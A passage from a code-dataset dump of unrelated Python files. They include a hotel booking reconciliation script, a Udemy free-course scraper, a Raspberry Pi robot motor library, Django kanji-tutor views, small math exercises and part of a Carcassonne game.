1)\n","sub_path":"tweets/api/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":2406,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"384485957","text":"import pandas as pd\nimport xlsxwriter\nimport os\nimport datetime\n\n# find the files neede to process\nhotel_file = \"\"\nwebsite_file = \"\"\nfiles = [f for f in os.listdir('.') if os.path.isfile(f)]\nfor f in files:\n if \"report\" in f and f[:2] != \"~$\":\n hotel_file = f\n if \"Booking.com\" in f and f[:2] != \"~$\":\n website_file = f\n\nmsg = \"Files detected:\\n\" + website_file + \"\\n\" + hotel_file + \"\\n\" + \"\\n\" + \"Press Enter key to begin the process.\"\na = raw_input(msg)\n\n\n# developed with python 3.5 for pyinstaller function\n#############################################################\n# check conditions and print out\ndef same_name(booking_name, hotel_name):\n if hotel_name[:5] == 'name\\n':\n hotel_name = hotel_name[5:]\n\n hotel_name = hotel_name.split(\",\")\n hotel_name = hotel_name[1][:] + \" \" + hotel_name[0]\n\n if hotel_name == booking_name:\n # print(\"h:\", hotel_name, \"b:\", booking_name)\n return True\n else:\n return False\n\n\n######################################################################################\nmatch = 0\ncanceled = 0\nnot_found = 0\n\n# load and prepare the booking df\nxl = pd.ExcelFile(website_file)\nwebsite_df = xl.parse(header=0, keep_default_na=False)\n\nwebsite_col_names = list(website_df)\nprint(website_col_names)\nfor name in website_col_names:\n a = name.split(\" \")\n if a[-1] == \"\":\n b = \" \".join(a[:-1])\n else:\n b = \" \".join(a)\n website_df = website_df.rename(columns={name: b})\n\nwebsite_col_names = list(website_df)\nprint(website_col_names)\n\nweb_df = website_df[website_df['Status'] == 'ok']\nprint('booking df created')\n\nguest_col_name = \"\"\nif \"Guest name(s)\" in list(web_df):\n guest_col_name = 'Guest name(s)'\n print(\"YESSSSSSSSSSSSSS\")\nelse:\n guest_col_name = 'Guest Name(s)'\n print(\"22222222222222\")\n\nfor index, row in web_df.iterrows():\n if row[guest_col_name] == '':\n name = row['Booked by']\n # .encode('utf-8')\n guest_name = name.split(\",\")\n web_df.loc[index, guest_col_name] = guest_name[1][1:] + \" \" + guest_name[0]\n\n##########################################\n# loading the ok DF\nxl = pd.ExcelFile(hotel_file)\no_df = xl.parse(header=0, keep_default_na=False, )\n\n\n#########################################\nbook_col_name = list(web_df)[0]\n\nprint(\"begin comparison\")\n# create worksheet\nworkbook = xlsxwriter.Workbook('Expenses.xlsx')\nworksheet = workbook.add_worksheet()\nrowm = 0\ncoln = 0\nworksheet.write(rowm, coln, \"Confirmation Number\")\nworksheet.write(rowm, coln + 1, \"CRS Number\")\nworksheet.write(rowm, coln + 2, \"Name\")\nworksheet.write(rowm, coln + 3, \"Booking.com Price\")\nworksheet.write(rowm, coln + 4, \"Description\")\nrowm += 1\n\nworkbook_nf = xlsxwriter.Workbook('Customers Not found.xlsx')\nworksheet_nf = workbook_nf.add_worksheet()\nrow_nf = 0\n\n# # print web_df\n# print(list(web_df))\n# for index, row in web_df.iterrows():\n# print(\"index:::\", index, row['Guest name(s)'].lower(),row['Check-in'],row['Check-out'],row['Price'])\n#\n\n# check loop\ngood = 0\nfor index, row in web_df.iterrows():\n\n # initialzie what to compare\n name = row[guest_col_name]\n check_in_date = row['Check-in']\n check_out_date = row['Check-out']\n # print(\"check_in_date: \", check_in_date)\n check_in_date = check_in_date.split(\"-\")\n # print(\"check_in_date after split: \", check_in_date)\n check_out_date = check_out_date.split(\"-\")\n found = False\n\n # check if in ok, but different price\n for index_ok, row_ok in o_df.iterrows():\n if (same_name(name.lower(), row_ok['GuestName'].lower())):\n found = True\n\n if row_ok['CancelDt'] != \"\":\n print(\"ROOM canceled\", row_ok['CancelDt'])\n\n worksheet.write(rowm, coln, row['Book number'])\n worksheet.write(rowm, coln + 1, row_ok['CRSBookNum'])\n worksheet.write(rowm, coln + 2, name)\n worksheet.write(rowm, coln + 3, row['Price'])\n worksheet.write(rowm, coln + 4, \"Cancelled\")\n\n print(name, \" found in CANCEL file\")\n rowm += 1\n canceled += 1\n break\n\n # if not found in cancel file, we check the date\n # hotel date\n date_format = \"%m/%d/%Y\"\n arrival = row_ok['ArrivalDt']\n\n h_arrival = datetime.datetime.strptime(arrival, date_format)\n h_departure = h_arrival + datetime.timedelta(days=row_ok['DaysStay'])\n # + int(row_ok['DaysStay'])\n\n # booking.com date\n\n b_checkin = datetime.datetime(int(check_in_date[0]), int(check_in_date[1]), int(check_in_date[2][:2]))\n b_checkout = datetime.datetime(int(check_out_date[0]), int(check_out_date[1]),\n int(check_out_date[2][:2]))\n found = True\n match += 1\n\n # print('h_arrival: ', h_arrival)\n # print('h_departure: ', h_departure)\n # print(\"b_checkin: \", b_checkin)\n # print(\"b_checkout\", b_checkout)\n\n if not ((h_arrival == b_checkin) & (h_departure == b_checkout)):\n worksheet.write(rowm, coln, row['Book number'])\n worksheet.write(rowm, coln + 1, row_ok['CRSBookNum'])\n worksheet.write(rowm, coln + 2, name)\n worksheet.write(rowm, coln + 3, row['Price'])\n worksheet.write(rowm, coln + 4, \"Checked in, but different date\")\n print(name, \" Found in OK file, but different date\")\n rowm += 1\n break\n else:\n good += 1\n print(name,\" everything match!\")\n break\n\n if found == False:\n # print(name, \" Can't find customer Name\")\n not_found += 1\n worksheet_nf.write(row_nf, 0, name)\n row_nf += 1\n print(name, \" customer not found\")\n\nprint('finished')\nprint(\"good:\", good)\nprint(\"match: \", match)\nprint(\"canceled: \", canceled)\nprint(\"not found: \", not_found)\nworkbook.close()\nworkbook_nf.close()\n\n","sub_path":"working_windows_extension/version_4/best_western/booking/best_western_booking_py27_V4.py","file_name":"best_western_booking_py27_V4.py","file_ext":"py","file_size_in_byte":6048,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"153198184","text":"def findSimple(a):\n simples = {}\n for i in range(a//2, 1, -1): #int(a**0.5)\n while True:\n if a / i == a // i:\n if i in simples:\n simples[i] += 1\n else:\n simples[i] = 1\n a /= i\n else:\n break\n if not simples:\n simples[a] = 1\n return simples\n\nn, k = [int(x) for x in input().split()]\nns, ks = findSimple(n), findSimple(k)\n#print(ns, ks)\nfor key in ks:\n if key not in ns:\n ns[key] = ks[key]\n elif ks[key] > ns[key]:\n ns[key] = ks[key]\n\nnumber = 1\nfor key in ns:\n number *= key * ns[key]\nprint(number)\n","sub_path":"Олимпиады/Окружной этап 2012/2.py","file_name":"2.py","file_ext":"py","file_size_in_byte":666,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"283322460","text":"from selenium import webdriver\nimport time\nimport datetime\n\nclass PythonOrgSearch():\n def __init__(self):\n chrome_options = webdriver.ChromeOptions()\n chrome_options.add_argument('--disable-extensions')\n chrome_options.add_argument('--headless')\n \n self.driver = webdriver.Chrome(options=chrome_options)\n\n def test_search(self, url):\n table = []\n url = url\n\n time.sleep(1)\n\n for i in range(0, len(url)):\n print(\"Uruchomienie strony: \" + str(url[i]))\n fullurl = 'https://www.udemy.com/courses/' + url[i] + '/?lang=pl&price=price-free&sort=popularity'\n self.driver.get(fullurl)\n time.sleep(2)\n\n find_class = self.driver.find_elements_by_class_name('component-margin')\n find_tagname = find_class[(len(find_class)-1)].find_elements_by_tag_name('a')\n\n licznik = 0\n for value in find_tagname:\n if 'course/' in value.get_attribute('href'):\n licznik+=1\n # print(value.get_attribute('href'))\n table.append(value.get_attribute('href'))\n\n if licznik >= 1:\n print('\\n(%s) Liczba znalezionych darmowych kursów: %d\\n' % (str(url[i]), licznik))\n else:\n print('\\n(%s) Liczba znalezionych darmowych kursów: 0\\n' % (str(url[i])))\n return table\n\n\n\n\n\nif __name__ == \"__main__\":\n url = [\n 'development',\n 'business',\n 'finance-and-accounting',\n 'it-and-software',\n 'office-productivity',\n 'personal-development',\n 'design',\n 'marketing',\n 'lifestyle',\n 'photography-and-video',\n 'health-and-fitness',\n 'music',\n 'teaching-and-academics']\n\n \n main = PythonOrgSearch()\n table = main.test_search(url)\n\n mydate = datetime.datetime.now()\n mydate = mydate.strftime(\"%d%m%Y\")\n\n full_url = \"Udemy-PolskieKursy \" + mydate + \".txt\"\n file = open(full_url, \"w\")\n\n for value in table:\n print(value)\n file.write(value+\"\\n\")\n \n file.close()\n\n print('\\nZakończono pomyślnie. :)')\n\n # print(table)\n\n\n \n\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2204,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"631291327","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\nimport time\nimport math\nimport smbus\nimport RPi.GPIO as GPIO\n\nDir = [\n 'forward',\n 'backward',\n]\n\nclass PCA9685:\n\n # Registers/etc.\n __SUBADR1 = 0x02\n __SUBADR2 = 0x03\n __SUBADR3 = 0x04\n __MODE1 = 0x00\n __PRESCALE = 0xFE\n __LED0_ON_L = 0x06\n __LED0_ON_H = 0x07\n __LED0_OFF_L = 0x08\n __LED0_OFF_H = 0x09\n __ALLLED_ON_L = 0xFA\n __ALLLED_ON_H = 0xFB\n __ALLLED_OFF_L = 0xFC\n __ALLLED_OFF_H = 0xFD\n\n def __init__(self, address, debug=False):\n self.bus = smbus.SMBus(1)\n self.address = address\n self.debug = debug\n if (self.debug):\n print(\"Reseting PCA9685\")\n self.write(self.__MODE1, 0x00)\n\n def write(self, reg, value):\n \"Writes an 8-bit value to the specified register/address\"\n self.bus.write_byte_data(self.address, reg, value)\n if (self.debug):\n print(\"I2C: Write 0x%02X to register 0x%02X\" % (value, reg))\n\n def read(self, reg):\n \"Read an unsigned byte from the I2C device\"\n result = self.bus.read_byte_data(self.address, reg)\n if (self.debug):\n print(\"I2C: Device 0x%02X returned 0x%02X from reg 0x%02X\" % (self.address, result & 0xFF, reg))\n return result\n\n def setPWMFreq(self, freq):\n \"Sets the PWM frequency\"\n prescaleval = 25000000.0 # 25MHz\n prescaleval /= 4096.0 # 12-bit\n prescaleval /= float(freq)\n prescaleval -= 1.0\n if (self.debug):\n print(\"Setting PWM frequency to %d Hz\" % freq)\n print(\"Estimated pre-scale: %d\" % prescaleval)\n prescale = math.floor(prescaleval + 0.5)\n if (self.debug):\n print(\"Final pre-scale: %d\" % prescale)\n\n oldmode = self.read(self.__MODE1)\n newmode = (oldmode & 0x7F) | 0x10 # sleep\n self.write(self.__MODE1, newmode) # go to sleep\n self.write(self.__PRESCALE, int(math.floor(prescale)))\n self.write(self.__MODE1, oldmode)\n time.sleep(0.005)\n self.write(self.__MODE1, oldmode | 0x80)\n\n def setPWM(self, channel, on, off):\n \"Sets a single PWM channel\"\n self.write(self.__LED0_ON_L + 4*channel, on & 0xFF)\n self.write(self.__LED0_ON_H + 4*channel, on >> 8)\n self.write(self.__LED0_OFF_L + 4*channel, off & 0xFF)\n self.write(self.__LED0_OFF_H + 4*channel, off >> 8)\n if (self.debug):\n print(\"channel: %d LED_ON: %d LED_OFF: %d\" % (channel,on,off))\n\n def setDutycycle(self, channel, pulse):\n self.setPWM(channel, 0, int(pulse * (4096 / 100)))\n\n def setLevel(self, channel, value):\n if (value == 1):\n self.setPWM(channel, 0, 4095)\n else:\n self.setPWM(channel, 0, 0)\n \n\n\n\n# 控制机器人库\nclass LOBOROBOT():\n def __init__(self):\n self.PWMA = 0\n self.AIN1 = 2\n self.AIN2 = 1\n\n self.PWMB = 5\n self.BIN1 = 3\n self.BIN2 = 4\n\n self.PWMC = 6\n self.CIN2 = 7\n self.CIN1 = 8\n\n self.PWMD = 11\n self.DIN1 = 25\n self.DIN2 = 24\n self.pwm = PCA9685(0x40, debug=False)\n self.pwm.setPWMFreq(50)\n GPIO.setwarnings(False)\n GPIO.setmode(GPIO.BCM)\n GPIO.setup(self.DIN1,GPIO.OUT)\n GPIO.setup(self.DIN2,GPIO.OUT)\n\n def MotorRun(self, motor, index, speed):\n if speed > 100:\n return\n if(motor == 0):\n self.pwm.setDutycycle(self.PWMA, speed)\n if(index == Dir[0]):\n self.pwm.setLevel(self.AIN1, 0)\n self.pwm.setLevel(self.AIN2, 1)\n else:\n self.pwm.setLevel(self.AIN1, 1)\n self.pwm.setLevel(self.AIN2, 0)\n elif(motor == 1):\n self.pwm.setDutycycle(self.PWMB, speed)\n if(index == Dir[0]):\n self.pwm.setLevel(self.BIN1, 1)\n self.pwm.setLevel(self.BIN2, 0)\n else:\n self.pwm.setLevel(self.BIN1, 0)\n self.pwm.setLevel(self.BIN2, 1)\n elif(motor == 2):\n self.pwm.setDutycycle(self.PWMC,speed)\n if(index == Dir[0]):\n self.pwm.setLevel(self.CIN1,1)\n self.pwm.setLevel(self.CIN2,0)\n else:\n self.pwm.setLevel(self.CIN1,0)\n self.pwm.setLevel(self.CIN2,1)\n elif(motor == 3):\n self.pwm.setDutycycle(self.PWMD,speed)\n if (index == Dir[0]):\n GPIO.output(self.DIN1,0)\n GPIO.output(self.DIN2,1)\n else:\n GPIO.output(self.DIN1,1)\n GPIO.output(self.DIN2,0)\n\n def MotorStop(self, motor):\n if (motor == 0):\n self.pwm.setDutycycle(self.PWMA, 0)\n elif(motor == 1):\n self.pwm.setDutycycle(self.PWMB, 0)\n elif(motor == 2):\n self.pwm.setDutycycle(self.PWMC, 0)\n elif(motor == 3):\n self.pwm.setDutycycle(self.PWMD, 0)\n # 前进\n def t_up(self,speed,t_time):\n self.MotorRun(0,'forward',speed)\n self.MotorRun(1,'forward',speed)\n self.MotorRun(2,'forward',speed)\n self.MotorRun(3,'forward',speed)\n time.sleep(t_time)\n #后退\n def t_down(self,speed,t_time):\n self.MotorRun(0,'backward',speed)\n self.MotorRun(1,'backward',speed)\n self.MotorRun(2,'backward',speed)\n self.MotorRun(3,'backward',speed)\n time.sleep(t_time)\n\n # 左移\n def moveLeft(self,speed,t_time):\n self.MotorRun(0,'backward',speed)\n self.MotorRun(1,'forward',speed)\n self.MotorRun(2,'forward',speed)\n self.MotorRun(3,'backward',speed)\n time.sleep(t_time)\n\n #右移\n def moveRight(self,speed,t_time):\n self.MotorRun(0,'forward',speed)\n self.MotorRun(1,'backward',speed)\n self.MotorRun(2,'backward',speed)\n self.MotorRun(3,'forward',speed)\n time.sleep(t_time)\n\n # 左转\n def turnLeft(self,speed,t_time):\n self.MotorRun(0,'backward',speed)\n self.MotorRun(1,'forward',speed)\n self.MotorRun(2,'backward',speed)\n self.MotorRun(3,'forward',speed)\n time.sleep(t_time)\n \n # 右转\n def turnRight(self,speed,t_time):\n self.MotorRun(0,'forward',speed)\n self.MotorRun(1,'backward',speed)\n self.MotorRun(2,'forward',speed)\n self.MotorRun(3,'backward',speed)\n time.sleep(t_time)\n \n # 前左斜\n def forward_Left(self,speed,t_time):\n self.MotorStop(0)\n self.MotorRun(1,'forward',speed)\n self.MotorRun(2,'forward',speed)\n self.MotorStop(0)\n time.sleep(t_time)\n\n # 前右斜\n def forward_Right(self,speed,t_time):\n self.MotorRun(0,'forward',speed)\n self.MotorStop(1)\n self.MotorStop(2)\n self.MotorRun(3,'forward',speed)\n time.sleep(t_time)\n\n # 后左斜\n def backward_Left(self,speed,t_time):\n self.MotorRun(0,'backward',speed)\n self.MotorStop(1)\n self.MotorStop(2)\n self.MotorRun(3,'backward',speed)\n time.sleep(t_time)\n \n # 后右斜\n def backward_Right(self,speed,t_time):\n self.MotorStop(0)\n self.MotorRun(1,'backward',speed)\n self.MotorRun(2,'backward',speed)\n self.MotorStop(3)\n time.sleep(t_time)\n\n\n # 停止\n def t_stop(self,t_time):\n self.MotorStop(0)\n self.MotorStop(1)\n self.MotorStop(2)\n self.MotorStop(3)\n time.sleep(t_time)\n\n # 辅助功能,使设置舵机脉冲宽度更简单。\n def set_servo_pulse(self,channel,pulse):\n pulse_length = 1000000 # 1,000,000 us per second\n pulse_length //= 60 # 60 Hz\n print('{0}us per period'.format(pulse_length))\n pulse_length //= 4096 # 12 bits of resolution\n print('{0}us per bit'.format(pulse_length))\n pulse *= 1000\n pulse //= pulse_length\n self.pwm.setPWM(channel, 0, pulse)\n\n # 设置舵机角度函数 \n def set_servo_angle(self,channel,angle):\n angle=4096*((angle*11)+500)/20000\n self.pwm.setPWM(channel,0,int(angle))\n","sub_path":"LOBOROBOT.py","file_name":"LOBOROBOT.py","file_ext":"py","file_size_in_byte":8057,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"296106848","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.7 (3394)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: D:\\dev\\scrapgo\\scrapgo\\modules\\request\\mixins.py\n# Compiled at: 2019-05-23 16:06:28\n# Size of source mod 2**32: 1030 bytes\nimport functools\nfrom collections import abc\nfrom scrapgo import settings\n\nclass RequestMixin(object):\n RETRY_INTERVAL_SECONDS = settings.RETRY_INTERVAL_SECONDS\n\n def __init__(self, *args, **kwargs):\n (super().__init__)(*args, **kwargs)\n\n @classmethod\n def retry(self, func):\n\n @functools.wraps(func)\n def wrapper(*args, **kwargs):\n if isinstance(self.RETRY_INTERVAL_SECONDS, abc.Iterable):\n for i, sec in enumerate(self.RETRY_INTERVAL_SECONDS):\n try:\n r = func(*args, **kwargs)\n except:\n message = 'Request Failed, retry after {}sec(trys: {})'.format(sec, i + 1)\n print(message)\n time.sleep(sec)\n else:\n return r\n\n else:\n r = func(*args, **kwargs)\n return r\n\n return wrapper","sub_path":"pycfiles/scrapgo-0.1.9.tar/mixins.cpython-37.py","file_name":"mixins.cpython-37.py","file_ext":"py","file_size_in_byte":1231,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"345314918","text":"import hashlib\n\n\ndef md5_hash():\n with open('countries.json', encoding='utf8') as read_file:\n for line in read_file:\n yield hashlib.md5(line.encode('utf-8')).hexdigest()\n\n\nfor hash in md5_hash():\n print(hash)\n","sub_path":"generator.py","file_name":"generator.py","file_ext":"py","file_size_in_byte":237,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"253367995","text":"import random\nimport math\nfrom datetime import date, timedelta\n\nfrom django.contrib.auth.mixins import LoginRequiredMixin\nfrom django.http import HttpResponseRedirect\nfrom django.views.generic.base import TemplateView\nfrom django.urls import reverse_lazy\nfrom django.utils.translation import gettext_lazy as _\n\nfrom .models import KanjiEntry, KanjiLearningRecord, KanjiTestingRecord\n\n\nDEFAULT_BASE_INTERVAL = 1\nDEFAULT_INTERVAL_RATE = 2\n\n\ndef query_string(**kwargs):\n query_params = []\n\n for key in kwargs:\n value = kwargs[key]\n if value is not None and value is not False:\n query_params.append(key + '=' + str(value))\n\n if query_params:\n return '?' + '&'.join(query_params)\n\n return ''\n\n\nclass LearnKanjiView(LoginRequiredMixin, TemplateView):\n template_name = 'tutor/learn_kanji.html'\n extra_context = {'title': _('Learn Kanji')}\n\n def get(self, request, *args, **kwargs):\n user_id = request.user.id\n\n query_set = KanjiEntry.objects.filter(\n kanjilearningrecord__user__id=user_id,\n kanjilearningrecord__is_learnt=False\n ).order_by('order')\n\n if query_set.count() > 0:\n entry = query_set[0]\n else:\n return HttpResponseRedirect(reverse_lazy('learn_kanji_done'))\n\n return self.render_to_response(self.get_context_data(entry=entry))\n\n def post(self, request, *args, **kwargs):\n entry_id = request.POST['entry_id']\n\n query_set = KanjiLearningRecord.objects.filter(\n user_id=request.user.id,\n kanji_entry__id=entry_id\n )\n\n learning_record = query_set.get()\n learning_record.is_learnt = True\n learning_record.save()\n\n KanjiTestingRecord.objects.create(\n kanji_entry=KanjiEntry.objects.get(pk=entry_id),\n user=request.user\n )\n\n return HttpResponseRedirect(reverse_lazy('learn_kanji'))\n\n\nclass LearnKanjiDoneView(TemplateView):\n template_name = 'tutor/learn_kanji_done.html'\n extra_context = {'title': _('Learn Kanji Done')}\n\n\nclass TestKanjiView(LoginRequiredMixin, TemplateView):\n template_name = 'tutor/test_kanji.html'\n extra_context = {'title': _('Test Kanji')}\n\n def get(self, request, *args, **kwargs):\n user_id = request.user.id\n\n query_set = KanjiEntry.objects.filter(\n kanjilearningrecord__user__id=user_id,\n kanjilearningrecord__is_learnt=True,\n kanjitestingrecord__user__id=user_id,\n kanjitestingrecord__test_date__lte=date.today()\n ).order_by('order')\n\n if query_set.count() > 0:\n tested_entry = query_set[0]\n else:\n return HttpResponseRedirect(reverse_lazy('test_kanji_done'))\n\n choices = [tested_entry]\n query_set = KanjiEntry.objects.exclude(id=tested_entry.id)\n other_entry_count = query_set.count()\n\n if other_entry_count > 2:\n other_choice_count = 3\n else:\n other_choice_count = other_entry_count\n\n for i in random.sample(range(other_entry_count),\n other_choice_count):\n if bool(random.getrandbits(1)):\n choices.append(query_set[i])\n else:\n choices.insert(0, query_set[i])\n\n return self.render_to_response(\n self.get_context_data(choices=choices, tested_entry=tested_entry)\n )\n\n def post(self, request, *args, **kwargs):\n entry_id = request.POST['tested_entry_id']\n answer_correct = entry_id == request.POST.get('chosen_entry_id')\n\n record = KanjiTestingRecord.objects.get(\n kanji_entry_id=entry_id,\n user_id=request.user.id\n )\n\n if answer_correct:\n interval = (\n DEFAULT_BASE_INTERVAL *\n math.pow(DEFAULT_INTERVAL_RATE, record.correct_streak)\n )\n\n record.correct_streak += 1\n record.test_date += timedelta(days=interval)\n record.save()\n\n elif record.correct_streak != 0:\n record.correct_streak = 0\n record.test_date = date.today()\n record.save()\n\n return HttpResponseRedirect(\n reverse_lazy(\n 'test_kanji_reveal',\n kwargs={'entry_id': entry_id}\n ) +\n query_string(answer_correct=answer_correct)\n )\n\n\nclass TestKanjiRevealView(TemplateView):\n template_name = 'tutor/test_kanji_reveal.html'\n\n extra_context = {\n 'title': _('Test Kanji Reveal'),\n 'next_link': reverse_lazy('test_kanji')\n }\n\n def get(self, request, *args, **kwargs):\n entry = KanjiEntry.objects.get(pk=kwargs.get('entry_id'))\n answer_correct = bool(request.GET.get('answer_correct'))\n\n return self.render_to_response(\n self.get_context_data(entry=entry, answer_correct=answer_correct)\n )\n\n\nclass TestKanjiDoneView(TemplateView):\n template_name = 'tutor/test_kanji_done.html'\n extra_context = {'title': _('Test Kanji Done')}\n","sub_path":"tutor/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5069,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"639379423","text":"#/usr/bin/python3\n#-*- coding:utf-8 -*-\n'''输入任何一个正整数n,并找出大于n的最小素数'''\n'''添加了判断是否为整数的语句'''\nm=input('请输入整数:')\nif m.isdigit(): #判断输入的是否是整数\n n = int(m) #把输入的整数由str类型转换为int\n while True: #无限循环\n n += 1\n # print(n)\n f = True\n a = 2\n while a < n - 1: #判断是否为素数,不是的话循环,是的话继续下一个语句\n if n % a == 0:\n f = False\n break\n a += 1\n if f:\n print('大于%s的最小素数是%d' % (m, n))\n break\nelse:\n print('你输入的数字不是整数')\n","sub_path":"2.程序流程控制/5.编程实践/3.找出大于n的素数.py","file_name":"3.找出大于n的素数.py","file_ext":"py","file_size_in_byte":756,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"536407757","text":"# -*- coding: utf-8 -*-\n\"\"\"\nConsider the software that runs on a self-checkout machine. One task that it must be\nable to perform is to determine how much change to provide when the shopper pays\nfor a purchase with cash.\nWrite a program that begins by reading a number of cents from the user as an\ninteger. Then your program should compute and display the denominations of the\ncoins that should be used to give that amount of change to the shopper. The change\nshould be given using as few coins as possible. Assume that the machine is loaded\nwith pennies, nickels, dimes, quarters, loonies and toonies.\n\n\nInformation: A one dollar coin was introduced in Canada in 1987. It is referred to as a\nloonie because one side of the coin has a loon (a type of bird) on it. The two\ndollar coin, referred to as a toonie, was introduced 9 years later. It’s name is\nderived from the combination of the number two and the name of the loonie.\n\n\n\n\n\n\n\"\"\"\n\ncents_per_loonie = 100\n\ncents_per_toonie = 200\n\ncents_per_quarter = 25\n\ncents_per_dime = 10\n\ncents_per_nickel = 5\n\n# lets read the number of cents from the user\ncents = int(input(\"Please enter the number of cents: \"))\n\n# We have to compute the minimum collection of coins to represent the number of cents enetered by the user.\n\nprint(\" \", cents // cents_per_loonie, \"loonies\")\ncents = cents % cents_per_loonie\n\nprint(\" \", cents // cents_per_toonie, \"toonies\")\ncents = cents % cents_per_toonie\n\nprint(\" \", cents // cents_per_quarter, \"quarter\")\ncents = cents % cents_per_quarter\n\nprint(\" \", cents // cents_per_dime, \"dime\")\ncents = cents % cents_per_dime\n\nprint(\" \", cents // cents_per_nickel, \"nickel\")\ncents = cents % cents_per_nickel\n\nprint(\" \", cents, \"pennies\")\n\n","sub_path":"Exercise 13 Making Change.py","file_name":"Exercise 13 Making Change.py","file_ext":"py","file_size_in_byte":1712,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"428994676","text":"import random\nimport collections\n\nclass Partida:\n\n #G Comprueba que el codigo sea el correcto en funcion del numero de jugadores.\n def jugadores_jugando(self, nombres_jugadores):\n\n numero_jugadores = len(nombres_jugadores)\n\n if (numero_jugadores == 1):\n\n return \"\\nTenemos un solo jugador participando en el carcassonne, su nombre es \"+ nombres_jugadores[0]+\".\\\n\\nDebemos incluir mas.\\n\"\n\n elif (numero_jugadores == 2):\n return \"\\nTenemos dos jugadores participando en el carcassonne, sus nombres son \"+ nombres_jugadores[0]+\" y \"+nombres_jugadores[1]+\".\\\n\\nPodemos incluir mas.\\n\"\n else:\n return \"\\nTenemos bastantes jugadores participando en el carcassonne, sus nombres son \"+ nombres_jugadores[0]+\", \"+nombres_jugadores[1]+\" y \"+nombres_jugadores[2]+\".\\\n\\nNo es necesario incluir mas.\\n\"\n\n # Comprueba que el numero de jugadores sea correcto\n def num_jug_correcto(self, nombres_jugadores):\n num_maximo_jugadores = 4\n num_minimo_jugadores = 2\n num_jugadores = len(nombres_jugadores)\n if num_jugadores > num_maximo_jugadores or num_jugadores < num_minimo_jugadores:\n return False\n else:\n return True\n\n #G Necesito esta funcion al meter a cada jugador nombre y edad.\n def devuelve_nombres_jugadores(self, jugadores):\n lista_nombres_jugadores = []\n\n for jugador in jugadores:\n lista_nombres_jugadores.append(jugador[0])\n return lista_nombres_jugadores\n\n # Comprueba que el nombre de los jugadores sea correcto\n def nombres_jug_correcto(self, nombres_jugadores):\n # Cuento la frecuencia de repeticion de los nombres\n freq = collections.Counter(nombres_jugadores).values()\n if max(freq) > 1:\n return False\n else:\n return True\n\n # Inicializa la lista de jugadores\n def inicializar_jugadores(self, nombres_jugadores):\n lista_jugadores = []\n for nombre in nombres_jugadores:\n lista_jugadores.append(Jugador(nombre))\n return lista_jugadores\n\n #G Mezcla los jugadores(cambia el orden)\n def jugador_decide_orden(self, jugadores):\n random.shuffle(jugadores)\n\n return jugadores\n\n #G Inicializa los jugadores, en la primera posicion el mas joven y luego los demas aleatoriamente\n def inicializar_jugadores_en_orden(self, jugador_mas_joven, jugadores):\n lista_jugadores = []\n lista_jugadores.append(Jugador(jugador_mas_joven[0]))\n jugadores.remove(jugador_mas_joven)\n #random.shuffle(jugadores)\n jugadores = self.jugador_decide_orden(jugadores)\n for jugador in jugadores:\n lista_jugadores.append(Jugador(jugador[0]))\n return lista_jugadores\n\n #G Inicializa la lista por la edad de los jugadores.\n def jugador_mas_joven(self, jugadores):\n i = 0\n for jugador in jugadores:\n if i==0:\n edad = jugador[1]\n jugador_mas_joven = jugador\n elif jugador[1] < edad:\n edad = jugador[1]\n jugador_mas_joven = jugador\n i += 1\n return jugador_mas_joven\n\n #G Codigo del jugador con menos edad\n def info_jugador_mas_joven(self, jugadores):\n i = 0\n for jugador in jugadores:\n if i==0:\n edad = jugador[1]\n jugador_mas_joven = jugador\n elif jugador[1] < edad:\n edad = jugador[1]\n jugador_mas_joven = jugador\n i += 1\n return \"\\nEl jugador mas joven se llama \"+ jugador_mas_joven[0]+\".\\\n Es un adolescente de \" + jugador_mas_joven[1]+ \".\\n\"\n\n # Inicializa la baraja\n def inicializar_baraja(self):\n numero_tipos_pieza = 19\n baraja = []\n for i in range(numero_tipos_pieza):\n baraja += Pieza_terreno(i+1).repetir_pieza()\n return baraja\n\n # Inicializa el tablero\n def inicializar_tablero(self):\n tipo_pieza_inicial = 10\n pieza_inicial = Pieza_terreno(tipo_pieza_inicial)\n pieza_inicial.coordenadas = [0, 0]\n tablero = [pieza_inicial]\n return tablero\n\n #Asignar turnos a los jugadores\n def asignar_turnos(self, jugadores):\n turno = 1\n i = 1\n turnos_jugador = []\n numero_turnos = 72\n numero_jugadores = len(jugadores)\n while (turno < numero_turnos):\n turnos_jugador.append(jugadores[i-1])\n if i == numero_jugadores:\n i = 0\n turno = turno + 1\n i = i + 1\n return turnos_jugador\n\n # Inicializacion de la partida\n def inicializar(self, nombres_jugadores):\n if not self.num_jug_correcto(nombres_jugadores):\n return \"Numero de jugadores incorrecto. Solo pueden jugar entre 2 y 4 personas\"\n if not self.nombres_jug_correcto(nombres_jugadores):\n return \"No se puede repetir el nombre de dos jugadores\"\n self.turno = 0\n self.jugadores = self.inicializar_jugadores(nombres_jugadores)\n self.baraja = self.inicializar_baraja() # baraja = fichas que aun se pueden jugar\n random.shuffle(self.baraja) # aleatorizo la baraja\n self.tablero = self.inicializar_tablero() # tablero = fichas que ya se han jugado\n self.caminos_encontrados = [] # lista con los caminos que se completaron\n self.monasterios_encontrados = [] # lista con los caminos ya completados\n self.lista_turnos = self.asignar_turnos(self.jugadores) # orden de los turnos de los jugadores\n return self\n\n # G Inicializacion de la partida con el nuevo orden\n def inicializar_actualizado(self, 